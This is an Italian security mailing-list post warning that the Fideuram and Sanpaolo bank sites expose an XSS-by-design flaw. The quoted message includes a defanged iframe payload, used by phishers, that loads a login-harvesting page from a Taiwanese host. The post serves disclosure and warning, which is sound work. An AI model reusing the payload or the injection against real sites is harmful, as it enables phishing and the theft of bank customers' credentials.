Ciao, Vorrei far notare a tutti che fideuram e sanpaolo non solo fanno parte dello stesso gruppo bancario.
E' quasi elementare pensare che condividano la stessa base codice, ed è triviale verificarlo. difatti, da aggiungere all'elenco c'è anche l'installazione presente su sanpaolo.com Come Marco mi ha fatto notare, tale segnalazione è molto triviale, e come ci sono arrivato io, possono arrivarci tutti. My two cents (no, questa vale anche un cent solo) Alessandro Marco d'Itri ha scritto: > Avevo segnalato la cosa un mese fa a tutti i contatti che avevo trovato > ma non ho avuto risposta, oggi ho tentato altre strade per contattarli > ma visto che visto che nel frattempo è intervenuta Spamhaus non c'è più > motivo di cercare di tenere la cosa riservata... > Se qualcuno conosce qualcuno che potrebbe capire la situazione magari lo > avverta. > > http://www.spamhaus.org/sbl/sbl.lasso?query=SBL62371 > > In pratica il sito ha una funzione accessibile pubblicamente per > inserire HTML arbitrario all'interno delle sue pagine HTTPS, XSS by > design. Chiunque abbia minime conoscenze di programmazione può intuire > come funziona guardando l'URL... > > Questa vulnerabilità viene attivamente sfruttata dalla solita banda di > phisher "HELO User" per inserire un iframe che punta al loro sito e > permette di raccogliere i dati inseriti dai clienti, che ragionevolmente > non si aspettano che il sito della propria banca correttamente > verificato con SSL in realtà invii i dati inseriti a un server > taiwanese: > > <I F RAME SRC="ht tp://su n.c oma ll.t w/ > script/LoginServlet.php?function=login" width=800 height=800 > scrolling="no" frameborder="0"></IFRAME> > > Anche il sito dell'iframe è sempre lo stesso da un mese. > > ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
